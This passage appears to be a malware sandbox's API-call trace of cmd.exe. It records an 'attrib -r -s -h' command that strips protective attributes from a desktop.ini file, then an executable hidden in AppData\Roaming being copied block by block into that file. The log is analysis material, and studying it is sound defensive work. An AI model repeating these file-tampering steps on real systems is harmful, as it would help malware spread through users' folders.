lpFindFileData=0x2aee68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee68) returned 0x3d2600 [0136.645] FindClose (in: hFindFile=0x3d2600 | out: hFindFile=0x3d2600) returned 1 [0136.645] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0136.645] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0136.645] GetConsoleTitleW (in: lpConsoleTitle=0x2af360, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.645] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af1e8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af2b0 | out: lpAttributeList=0x2af1e8, lpSize=0x2af2b0) returned 1 [0136.645] UpdateProcThreadAttribute (in: lpAttributeList=0x2af1e8, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af2a8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af1e8, lpPreviousValue=0x0) returned 1 [0136.645] GetStartupInfoW (in: lpStartupInfo=0x2af1a4 | out: lpStartupInfo=0x2af1a4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0136.645] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0136.646] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2af244*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, 
dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af290 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" ", lpProcessInformation=0x2af290*(hProcess=0x50, hThread=0x4c, dwProcessId=0xd78, dwThreadId=0xd74)) returned 1 [0136.652] CloseHandle (hObject=0x4c) returned 1 [0136.652] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0136.652] GetEnvironmentStringsW () returned 0x3d0b18* [0136.652] FreeEnvironmentStringsW (penv=0x3d0b18) returned 1 [0136.652] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0136.825] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2af184 | out: lpExitCode=0x2af184*=0x0) returned 1 [0136.825] CloseHandle (hObject=0x50) returned 1 [0136.825] _vsnwprintf (in: _Buffer=0x2af2cc, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af190 | out: _Buffer="00000000") returned 8 [0136.825] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0136.825] GetEnvironmentStringsW () returned 0x3d2670* [0136.825] FreeEnvironmentStringsW (penv=0x3d2670) returned 1 [0136.825] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0136.825] GetEnvironmentStringsW () returned 0x3d2670* [0136.825] FreeEnvironmentStringsW (penv=0x3d2670) returned 1 [0136.825] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af1e8 | out: lpAttributeList=0x2af1e8) [0136.825] GetConsoleTitleW (in: lpConsoleTitle=0x2af568, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.826] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2ae5e0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x2ae5e4, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, 
lpMaximumComponentLength=0x2ae5e0*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0136.826] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0136.830] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0136.830] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0136.830] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\desktop.ini")) returned 0xffffffff [0136.830] GetLastError () returned 0x2 [0136.830] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t")) returned 0x10 [0136.830] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0136.830] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0136.830] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\desktop.ini")) returned 0xffffffff [0136.830] GetLastError () returned 0x2 [0136.830] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x3d376c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3d376c) returned 0xffffffff [0136.830] GetLastError () returned 0x2 [0136.830] _get_osfhandle (_FileHandle=2) returned 0xb [0136.830] GetFileType (hFile=0xb) returned 0x2 [0136.831] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0136.831] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2aefe0 | out: lpMode=0x2aefe0) returned 1 [0136.831] _get_osfhandle (_FileHandle=2) returned 0xb [0136.831] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2af014 | out: lpConsoleScreenBufferInfo=0x2af014) returned 1 [0136.831] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, 
dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0136.832] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.832] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.832] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.832] GetFileType (hFile=0x7) returned 0x2 [0136.832] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0136.832] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2af704 | out: lpMode=0x2af704) returned 1 [0136.833] _dup (_FileHandle=1) returned 3 [0136.833] _close (_FileHandle=1) returned 0 [0136.833] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini", _String2="con") returned -53 [0136.833] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2af6d4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0136.837] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0136.837] GetConsoleTitleW (in: lpConsoleTitle=0x2af504, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.838] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x2af068, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2af068) returned 0x3d1488 [0136.838] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0136.838] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0136.838] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0136.838] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: 
"c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2adf74, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0136.838] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0136.838] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.838] GetFileType (hFile=0x58) returned 0x1 [0136.838] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.838] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x2adfcc | out: lpFileSizeHigh=0x2adfcc*=0x0) returned 0x7d600 [0136.838] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.838] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.838] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.838] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.839] GetFileType (hFile=0x50) returned 0x1 [0136.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.839] GetFileType (hFile=0x50) returned 0x1 [0136.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.839] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.841] GetFileType (hFile=0x50) returned 0x1 [0136.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.841] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.841] _get_osfhandle (_FileHandle=1) 
returned 0x50 [0136.841] GetFileType (hFile=0x50) returned 0x1 [0136.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.841] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.841] GetFileType (hFile=0x50) returned 0x1 [0136.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.841] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.841] GetFileType (hFile=0x50) returned 0x1 [0136.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.841] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.842] GetFileType (hFile=0x50) returned 0x1 [0136.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.842] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.842] GetFileType (hFile=0x50) returned 0x1 [0136.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.842] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.842] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.842] 
SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.842] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.842] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.842] GetFileType (hFile=0x50) returned 0x1 [0136.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.842] GetFileType (hFile=0x50) returned 0x1 [0136.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.842] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.842] GetFileType (hFile=0x50) returned 0x1 [0136.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.842] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.843] GetFileType (hFile=0x50) returned 0x1 [0136.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.843] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.843] GetFileType (hFile=0x50) returned 0x1 [0136.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.843] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | 
out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.843] GetFileType (hFile=0x50) returned 0x1 [0136.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.843] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.843] GetFileType (hFile=0x50) returned 0x1 [0136.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.843] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.843] GetFileType (hFile=0x50) returned 0x1 [0136.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.844] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.844] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.844] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.844] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.844] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.844] GetFileType (hFile=0x50) returned 0x1 [0136.844] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.844] GetFileType (hFile=0x50) returned 0x1 [0136.845] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0136.845] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.845] GetFileType (hFile=0x50) returned 0x1 [0136.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.845] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.845] GetFileType (hFile=0x50) returned 0x1 [0136.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.845] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.845] GetFileType (hFile=0x50) returned 0x1 [0136.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.845] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.845] GetFileType (hFile=0x50) returned 0x1 [0136.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.845] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.845] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.845] GetFileType (hFile=0x50) returned 0x1 [0136.845] _get_osfhandle (_FileHandle=1) returned 0x50 
[0136.845] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.846] GetFileType (hFile=0x50) returned 0x1 [0136.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.846] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.846] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.846] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.846] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.846] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.846] GetFileType (hFile=0x50) returned 0x1 [0136.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.846] GetFileType (hFile=0x50) returned 0x1 [0136.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.846] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.846] GetFileType (hFile=0x50) returned 0x1 [0136.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.846] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 
[0136.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.846] GetFileType (hFile=0x50) returned 0x1 [0136.846] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.846] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.847] GetFileType (hFile=0x50) returned 0x1 [0136.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.847] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.847] GetFileType (hFile=0x50) returned 0x1 [0136.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.847] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.847] GetFileType (hFile=0x50) returned 0x1 [0136.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.847] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.847] GetFileType (hFile=0x50) returned 0x1 [0136.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.847] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.847] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0136.847] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.847] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.847] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.847] GetFileType (hFile=0x50) returned 0x1 [0136.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.847] GetFileType (hFile=0x50) returned 0x1 [0136.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.848] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.848] GetFileType (hFile=0x50) returned 0x1 [0136.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.848] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.848] GetFileType (hFile=0x50) returned 0x1 [0136.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.848] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.848] GetFileType (hFile=0x50) returned 0x1 [0136.848] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.848] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, 
